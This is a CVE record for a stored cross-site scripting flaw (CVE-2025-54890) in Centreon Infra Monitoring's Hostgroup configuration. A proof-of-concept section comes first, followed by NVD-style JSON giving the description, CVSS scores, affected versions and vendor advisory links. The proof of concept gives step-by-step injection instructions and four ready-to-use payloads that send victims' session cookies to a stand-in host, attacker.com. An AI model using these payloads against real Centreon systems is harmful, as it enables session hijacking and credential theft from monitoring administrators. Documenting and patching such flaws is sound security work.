CVE-2025-54890

// CVE-2025-54890 PoC - Stored XSS in Centreon Hostgroup Configuration // Author: Security Researcher // Target: Centreon Infra Monitoring <= 24.10.14, <= 24.04.18, <= 23.10.28 // Step 1: Authenticate to Centreon with high privilege account (e.g., Admin) // Step 2: Navigate to Infrastructure > Hosts > Hostgroups // Step 3: Create new Hostgroup or edit existing one // Step 4: In the Hostgroup name or description field, inject XSS payload: const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'; // Alternative XSS payloads: // <img src=x onerror="fetch('https://attacker.com/steal?data='+btoa(document.cookie))"> // <svg/onload=fetch('https://attacker.com/exfil?cookie='+document.cookie)> // <body onload="fetch('https://attacker.com/steal?c='+document.cookie)"> // Step 5: Save the Hostgroup configuration // Step 6: Any user viewing the Hostgroups list or details will trigger the XSS // Impact: Session hijacking, credential theft, privilege escalation

{"cve": {"id": "CVE-2025-54890", "sourceIdentifier": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "published": "2025-12-22T11:15:57.947", "lastModified": "2026-01-26T14:05:50.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Hostgroup configuration page) allows Stored \n\nXSS by users with elevated privileges.This issue affects Infra Monitoring: from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19, from 23.10.0 before 23.10.29."}], "metrics": {"cvssMetricV31": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:*", "versionStartIncluding": "23.10.0", "versionEndExcluding": "23.10.29", "matchCriteriaId": "FB16EBCA-977D-4434-ADD0-5A363EF0941A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.04.0", "versionEndExcluding": "24.04.19", "matchCriteriaId": "440A575D-6C68-4894-A4DB-C62065FE0349"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.10.0", "versionEndExcluding": "24.10.15", "matchCriteriaId": "BE9F2C39-E778-4EFE-8E0B-14D5174A717D"}]}]}], "references": [{"url": "https://github.com/centreon/centreon/releases", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Release Notes"]}, {"url": "https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54890-centreon-web-medium-severity-5342", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Patch", "Vendor Advisory"]}]}}